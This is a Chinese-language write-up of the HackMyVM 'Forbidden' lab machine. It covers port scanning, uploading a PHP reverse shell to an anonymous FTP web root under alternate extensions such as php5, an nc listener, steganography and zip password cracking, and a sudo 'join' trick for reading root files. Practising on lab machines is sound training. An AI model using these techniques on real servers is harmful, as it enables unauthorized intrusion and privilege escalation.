guayu-kakeru
0%

HMV-Forbidden

发表于 分类于

HMV-Forbidden靶机复盘

端口扫描/信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.58.239     
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-02 13:56 CST
Nmap scan report for bogon (192.168.58.239)
Host is up (0.0017s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.58.11
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 0        0            4096 Oct 09  2020 www [NSE: writeable]
80/tcp open  http    nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
MAC Address: 6E:0B:06:76:34:C6 (Unknown)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Unix

TRACEROUTE
HOP RTT     ADDRESS
1   1.66 ms bogon (192.168.58.239)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.84 seconds

开放21和80,先去ftp这里看看能不能匿名登录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
150 Here comes the directory listing.
drwxrwxrwx    2 0        0            4096 Oct 09  2020 .
drwxr-xr-x    3 0        113          4096 Oct 09  2020 ..
-rwxrwxrwx    1 0        0             241 Oct 09  2020 index.html
-rwxrwxrwx    1 0        0              75 Oct 09  2020 note.txt
-rwxrwxrwx    1 0        0              10 Oct 09  2020 robots.txt
226 Directory send OK.
ftp> cat note.txt
?Invalid command.
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||39793|)
150 Opening BINARY mode data connection for note.txt (75 bytes).
100% |***********************************************************************************************************|    75       14.41 KiB/s    00:00 ETA
226 Transfer complete.
75 bytes received in 00:00 (8.37 KiB/s)
ftp> get robots.txt
local: robots.txt remote: robots.txt
229 Entering Extended Passive Mode (|||36280|)
150 Opening BINARY mode data connection for robots.txt (10 bytes).
100% |***********************************************************************************************************|    10        6.60 KiB/s    00:00 ETA
226 Transfer complete.
10 bytes received in 00:00 (2.20 KiB/s)

登录上去之后发现www目录下面有三个文件,我们直接get拿到本地来,这里应该用目录扫描也能得到这几个文件

1
2
3
4
5
6
┌──(root㉿kakeru)-[~/tmp]
└─# cat note.txt      
The extra-secured .jpg file contains my password but nobody can obtain it.
┌──(root㉿kakeru)-[~/tmp]
└─# cat robots.txt 
/note.txt

web探测

1
2
SECURE WEB/FTP
Hi, Im the best admin of the world. You cannot execute .php code on this server so you cannot obtain a reverse shell. Not sure if its misconfigured another things... but the importart is that php is disabled. -marta

这里一直在强调php被ban不能反弹shell 然后还有一个用户名marta
那现在就是目录扫描web服务,然后找到扩展名是.jpg的文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(root㉿kakeru)-[~/tmp]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u 192.168.58.239  -x jpg,php,txt,js
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.58.239
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,js,jpg
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/robots.txt           (Status: 200) [Size: 10]
/note.txt             (Status: 200) [Size: 75]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished

扫描结果没有显示多余的信息,那现在的目标只能放在ftp上了,因为web这里已经没有多余的信息。
刚才利用ftp下载文件,现在我们也能利用ftp上传文件,因为ftp匿名访问的就是www目录,里面的note.txt就是web可以访问到的路径
但是这里一直说php不能执行,我们知道php还有很多扩展名,我们都试试 php3,php5,pht,phtml,phps 都是 php 可运行的文件扩展名

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
┌──(root㉿kakeru)-[~/tmp]
└─# cp php-reverse-shell.php shell.php3
                                                                                                                                                        
┌──(root㉿kakeru)-[~/tmp]
└─# cp php-reverse-shell.php shell.php5
                                                                                                                                                        
┌──(root㉿kakeru)-[~/tmp]
└─# cp php-reverse-shell.php shell.phps
                                                                                                                                                        
┌──(root㉿kakeru)-[~/tmp]
└─# cp php-reverse-shell.php shell.pht 
                                                                                                                                                        
┌──(root㉿kakeru)-[~/tmp]
└─# ftp anonymous@192.168.58.239
Connected to 192.168.58.239.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put shell.php3
local: shell.php3 remote: shell.php3
229 Entering Extended Passive Mode (|||5545|)
553 Could not create file.
ftp> ls
229 Entering Extended Passive Mode (|||36869|)
150 Here comes the directory listing.
drwxrwxrwx    2 0        0            4096 Oct 09  2020 www
226 Directory send OK.
ftp> cd www
250 Directory successfully changed.
ftp> put shell.php3
local: shell.php3 remote: shell.php3
229 Entering Extended Passive Mode (|||15003|)
150 Ok to send data.
100% |***********************************************************************************************************|  5496       30.83 MiB/s    00:00 ETA
226 Transfer complete.
5496 bytes sent in 00:00 (557.10 KiB/s)
ftp> put shell.php5
local: shell.php5 remote: shell.php5
229 Entering Extended Passive Mode (|||57590|)
150 Ok to send data.
100% |***********************************************************************************************************|  5496       30.65 MiB/s    00:00 ETA
226 Transfer complete.
5496 bytes sent in 00:00 (930.02 KiB/s)
ftp> put shell.phps
local: shell.phps remote: shell.phps
229 Entering Extended Passive Mode (|||50303|)
150 Ok to send data.
100% |***********************************************************************************************************|  5496       11.77 MiB/s    00:00 ETA
226 Transfer complete.
5496 bytes sent in 00:00 (857.65 KiB/s)
ftp> put shell.pht
local: shell.pht remote: shell.pht
229 Entering Extended Passive Mode (|||34415|)
150 Ok to send data.
100% |***********************************************************************************************************|  5496       25.44 MiB/s    00:00 ETA
226 Transfer complete.
5496 bytes sent in 00:00 (838.49 KiB/s)

把反弹shell的php文件更改后缀名之后都上传到www目录下面
尝试之后发现php5可以,(这里我第一次把php中的ip写错了,所以改了一下名称) 成功拿到了webshell

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234            
Linux forbidden 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
 03:22:44 up 31 min,  0 users,  load average: 0.35, 0.18, 0.27
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.58.239/shell1.php5

提权

www用户没有sudo权限
然后根据上面web的提示,要找到jpg文件
找到了之后发现有python3 直接用python3开启http服务,本机上wget下载这个图片

1
2
3
4
5
6
7
www-data@forbidden:/home$ find / -name "*.jpg" -print 2>/dev/null
/var/www/html/TOPSECRETIMAGE.jpg

www-data@forbidden:~/html$ which python3
/usr/bin/python3
www-data@forbidden:~/html$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

用stegseek破解一下这个图片

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(root㉿kakeru)-[~/tmp]
└─# stegseek  -f TOPSECRETIMAGE.jpg -wl rockyou.txt 
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "portugal"
[i] Original filename: "pass.zip".
[i] Extracting to "TOPSECRETIMAGE.jpg.out".

┌──(root㉿kakeru)-[~/tmp]
└─# steghide extract -sf TOPSECRETIMAGE.jpg        
Enter passphrase: 
wrote extracted data to "pass.zip".

┌──(root㉿kakeru)-[~/tmp]
└─# unzip TOPSECRETIMAGE.jpg.out 
Archive:  TOPSECRETIMAGE.jpg.out
[TOPSECRETIMAGE.jpg.out] pass.txt password: 
password incorrect--reenter: 
password incorrect--reenter:    

┌──(root㉿kakeru)-[~/tmp]
└─# unzip pass.zip 
Archive:  pass.zip
[pass.zip] pass.txt password: 
password incorrect--reenter: 
password incorrect--reenter: 
   skipping: pass.txt                incorrect password

但是发现用这个爆破出来的passphrase只能获取zip,不是zip的解压密码,所以用zip2john把这个zip变成可以让john爆破的形式

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
                                                                                                                                                       
┌──(root㉿kakeru)-[~/tmp]
└─# zip2john pass.zip > tmp 
ver 2.0 efh 5455 efh 7875 pass.zip/pass.txt PKZIP Encr: TS_chk, cmplen=66, decmplen=71, crc=E22A2397 ts=9831 cs=9831 type=8
                                                                                                                                                        
┌──(root㉿kakeru)-[~/tmp]
└─# john tmp                                                                                   
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
secret           (pass.zip/pass.txt)     
1g 0:00:00:00 DONE 2/3 (2025-03-02 16:34) 100.0g/s 3069Kp/s 3069Kc/s 3069KC/s 123456..ferrises
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                                                                                        
┌──(root㉿kakeru)-[~/tmp]
└─# unzip pass.zip              
Archive:  pass.zip
[pass.zip] pass.txt password: 
replace pass.txt? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
  inflating: pass.txt                
                                                                                                                                                        
┌──(root㉿kakeru)-[~/tmp]
└─# cat pass.txt
- .... .
.--. .- ... ... .-- --- .-. -..
.. ... ---...

vGffXfDreF453!

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kakeru)-[~/tmp]
└─# cat pass.txt
- .... .
.--. .- ... ... .-- --- .-. -..
.. ... ---...

vGffXfDreF453!
                                                                                                                                                        
┌──(root㉿kakeru)-[~/tmp]
└─# echo vGffXfDreF453 | base64 -d                           
¼gß]ðëx^9base64: invalid input

我尝试用vGffXfDreF453这个密码,发现不是哪一个用户的密码
这里没有思路了,看了下wp,返现这个jpg文件的名字就是密码,,,啊 这个名字确实很奇怪,还是大写的,应该注意到的😲

1
2
3
4
5
6
marta@forbidden:~$ sudo -l
Matching Defaults entries for marta on forbidden:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User marta may run the following commands on forbidden:
    (ALL : ALL) NOPASSWD: /usr/bin/join

在gtfobins里面可以找到提权方法,这个join命令是根据两个文件的共同字段合并行,类似于 SQL 的 JOIN 操作。可以利用这个读取任意文件
sudo join -a 2 /dev/null $LFILE -a 2这个参数的意思是输出第二个文件中所有行,即使这些行在第一个文件中没有匹配项。

1
2
3
4
5
marta@forbidden:/home$ sudo /usr/bin/join -a 2 /dev/null /home/markos/user.txt     
HMVpussycat

marta@forbidden:~$ sudo /usr/bin/join -a 2 /dev/null /root/root.txt
HMVmymymymymind

总结

对ftp的用法更加了解,包括上传文件和下载文件, 对于可以控制www目录的时候应该更加注意,可以上传反弹shell 的php
在不能用php的时候考虑不同的扩展名
对于一些文件的名字也要更加敏感,包括一些看起来像密码的文件名
学习到了join命令是什么,以及利用的方法